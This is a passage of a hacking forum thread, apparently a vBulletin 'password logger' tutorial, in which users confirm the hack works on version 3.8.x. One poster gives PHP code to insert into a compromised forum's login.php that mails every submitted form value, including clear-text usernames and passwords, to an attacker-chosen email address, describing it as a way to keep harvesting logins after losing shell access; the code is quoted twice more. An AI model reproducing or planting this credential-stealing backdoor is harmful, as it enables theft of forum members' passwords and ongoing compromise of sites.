Waraxe IT Security Portal
Login or Register
October 20, 2025
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 104
Members: 0
Total: 104
Full disclosure
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> [vBulletin] [Tutorial] Password logger Goto page Previous1, 2, 3, 4
Post new topicReply to topic View previous topic :: View next topic
PostPosted: Wed Mar 04, 2009 5:59 pm Reply with quote
Parted
Beginner
Beginner
Joined: Mar 04, 2009
Posts: 1




Working great on Vb3.8.* also. Great tutorial. Thx Very Happy
View user's profile Send private message
nice.. working 100% in 3.8.1
PostPosted: Tue Apr 14, 2009 3:26 pm Reply with quote
transfer
Regular user
Regular user
Joined: Apr 14, 2009
Posts: 11




nice.. working 100% in 3.8.1
View user's profile Send private message
PostPosted: Thu Apr 30, 2009 4:23 am Reply with quote
Overhit
Beginner
Beginner
Joined: Apr 30, 2009
Posts: 3




Working on 3.8.1

This site is screwed.
View user's profile Send private message
PostPosted: Fri Sep 25, 2009 11:46 am Reply with quote
Bigdeal
Beginner
Beginner
Joined: Sep 04, 2009
Posts: 3




Theres a simpler way, open an mail addy where you want to send logins too...

In login.php you will c:
Code:

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));

// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}


Straight under that add this...

Code:
$email = $HTTP_POST_VARS[email];
$mailto = "YOUR EMAIL ADDY HERE";
$mailsubj = "Form submission hacked site";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody = "Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; }
if (!eregi("\n",$HTTP_POST_VARS[email])) { mail($mailto, $mailsubj, $mailbody, $mailhead); }


Then all clear text login usernames and passwords are sent to the email address you specify..

This is probably a better way as all servers has different permissions and most of the time you cant write to files, so this way atleast if you loose shell you still got there passwords coming to your email addy ^^

Regards

U1
View user's profile Send private message
PostPosted: Sat Sep 26, 2009 9:30 pm Reply with quote
tError
Regular user
Regular user
Joined: Jul 23, 2008
Posts: 19




Does it work in 3.8.4 ?
View user's profile Send private message
PostPosted: Tue Sep 29, 2009 10:05 am Reply with quote
Sleeper
Regular user
Regular user
Joined: Jan 04, 2009
Posts: 12
Location: Earth




Bigdeal wrote:
Theres a simpler way, open an mail addy where you want to send logins too...

In login.php you will c:
Code:

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));

// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}


Straight under that add this...

Code:
$email = $HTTP_POST_VARS[email];
$mailto = "YOUR EMAIL ADDY HERE";
$mailsubj = "Form submission hacked site";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody = "Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; }
if (!eregi("\n",$HTTP_POST_VARS[email])) { mail($mailto, $mailsubj, $mailbody, $mailhead); }


Then all clear text login usernames and passwords are sent to the email address you specify..

This is probably a better way as all servers has different permissions and most of the time you cant write to files, so this way atleast if you loose shell you still got there passwords coming to your email addy ^^

Regards

U1


So do we ONLY need to use JUST THIS CODE or do we still need to use your code in conjunction with the other code that tr0nix posted?
View user's profile Send private message
PostPosted: Wed Sep 30, 2009 1:51 am Reply with quote
Bigdeal
Beginner
Beginner
Joined: Sep 04, 2009
Posts: 3




Sleeper wrote:
Bigdeal wrote:
Theres a simpler way, open an mail addy where you want to send logins too...

In login.php you will c:
Code:

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));

// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}


Straight under that add this...

Code:
$email = $HTTP_POST_VARS[email];
$mailto = "YOUR EMAIL ADDY HERE";
$mailsubj = "Form submission hacked site";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody = "Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; }
if (!eregi("\n",$HTTP_POST_VARS[email])) { mail($mailto, $mailsubj, $mailbody, $mailhead); }


Then all clear text login usernames and passwords are sent to the email address you specify..

This is probably a better way as all servers has different permissions and most of the time you cant write to files, so this way atleast if you loose shell you still got there passwords coming to your email addy ^^

Regards

U1


So do we ONLY need to use JUST THIS CODE or do we still need to use your code in conjunction with the other code that tr0nix posted?


You only need to use my code nothing else... =)
View user's profile Send private message
PostPosted: Tue Feb 02, 2010 8:42 pm Reply with quote
SaiYan
Beginner
Beginner
Joined: Feb 02, 2010
Posts: 1




Hi, sorry i up the subject because i have a problem to the logout script.

The tr0nix's logout script is working on Firefox but it doesn't on IE and Google Chrome.

It's the same with the Sleeper's logout script. And i don't understand the modification of tr0nix who works for Sleeper. Why change the script after a reload ?

Can you help me please.

SaiYan.

ps : sorry for my bad english i'm french Smile
View user's profile Send private message
[vBulletin] [Tutorial] Password logger
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 4 of 4
Goto page Previous1, 2, 3, 4
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



PCWizardHub - Helping you fix, build, and optimize your PC life
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.028 Seconds